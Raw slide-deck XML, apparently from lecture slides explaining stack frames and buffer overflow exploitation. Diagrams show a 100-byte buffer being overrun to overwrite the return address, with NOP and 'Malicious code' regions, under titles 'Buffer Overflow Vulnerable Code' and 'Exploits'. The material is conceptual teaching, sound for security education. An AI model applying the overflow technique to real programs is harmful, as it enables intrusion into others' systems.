              <a:rPr lang="en"/>
              <a:t>	int x, y</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x= a + b ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>y = a - b;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="3020500"/>
            <a:ext cx="1367700" cy="65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Local variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="1996675"/>
            <a:ext cx="1367700" cy="51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Return addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="1371725"/>
            <a:ext cx="1367700" cy="65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Arguments </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755325" y="3054650"/>
            <a:ext cx="1133100" cy="3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Low addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755325" y="1215800"/>
            <a:ext cx="1133100" cy="3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high addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="2481950"/>
            <a:ext cx="13677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Previous frame pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8013925" y="3060850"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187900" y="2745000"/>
            <a:ext cx="1996500" cy="3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Current</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> frame pointer </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8045325" y="808400"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="880425"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121525" y="3355425"/>
            <a:ext cx="1996500" cy="3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Current </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stack pointer </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8013925" y="3670450"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Google Shape;191;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3670450"/>
            <a:ext cx="6021501" cy="1209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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Buffer Overflow Vulnerable Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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stack.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="198" name="Google Shape;198;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368438" y="1292275"/>
            <a:ext cx="5019675" cy="3276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ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Buffer Overflow Vulnerable Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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5" name="Google Shape;205;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4069350" y="1152475"/>
            <a:ext cx="5124450" cy="3543300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Google Shape;206;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="259350" y="1209825"/>
            <a:ext cx="3810000" cy="3543300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823375" y="4568750"/>
            <a:ext cx="615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char str[100] = “hello \0 world”; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668175" y="3314950"/>
            <a:ext cx="449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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>99</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>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ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962625" y="3553900"/>
            <a:ext cx="1367700" cy="65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buff[99]</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buff[0]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962625" y="2530075"/>
            <a:ext cx="1367700" cy="51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Return addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962625" y="1905125"/>
            <a:ext cx="1367700" cy="65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Arguments </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3812150"/>
            <a:ext cx="1133100" cy="3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Low addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40325" y="1749200"/>
            <a:ext cx="1133100" cy="3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high addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="475400" y="2172825"/>
            <a:ext cx="10200" cy="1792200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962625" y="3015350"/>
            <a:ext cx="13677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Previous frame pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2298925" y="3594250"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2337825" y="3092025"/>
            <a:ext cx="1133100" cy="6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Current</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> frame </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pointer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(ebp) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2331950" y="1341725"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972450" y="1413875"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324825" y="3553900"/>
            <a:ext cx="1367700" cy="65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buff[99]</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buff[0]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324825" y="2530075"/>
            <a:ext cx="1367700" cy="51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Overwrite with new addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324825" y="1905125"/>
            <a:ext cx="1367700" cy="65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overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324825" y="3015350"/>
            <a:ext cx="13677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overwrite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4661125" y="3594250"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835100" y="3026400"/>
            <a:ext cx="1996500" cy="6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br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(ebp) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670600" y="1026725"/>
            <a:ext cx="23100" cy="3544200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314300" y="993900"/>
            <a:ext cx="11700" cy="3649200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324825" y="1295525"/>
            <a:ext cx="1367700" cy="65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Malicious code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4684075" y="1978300"/>
            <a:ext cx="656283" cy="864100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="34564" w="39823">
                <a:moveTo>
                  <a:pt x="0" y="34564"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6636" y="31574"/>
                  <a:pt x="39741" y="22387"/>
                  <a:pt x="39814" y="16626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39887" y="10865"/>
                  <a:pt x="7001" y="2771"/>
                  <a:pt x="438" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="3553900"/>
            <a:ext cx="1367700" cy="65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buff[99]</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buff[0]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="2530075"/>
            <a:ext cx="1367700" cy="51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Overwrite with new addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="2218950"/>
            <a:ext cx="1367700" cy="33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NOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="3015350"/>
            <a:ext cx="13677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overwrite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7175725" y="3594250"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7349700" y="3026400"/>
            <a:ext cx="1996500" cy="6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br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(ebp) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7197225" y="731400"/>
            <a:ext cx="11100" cy="3839700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
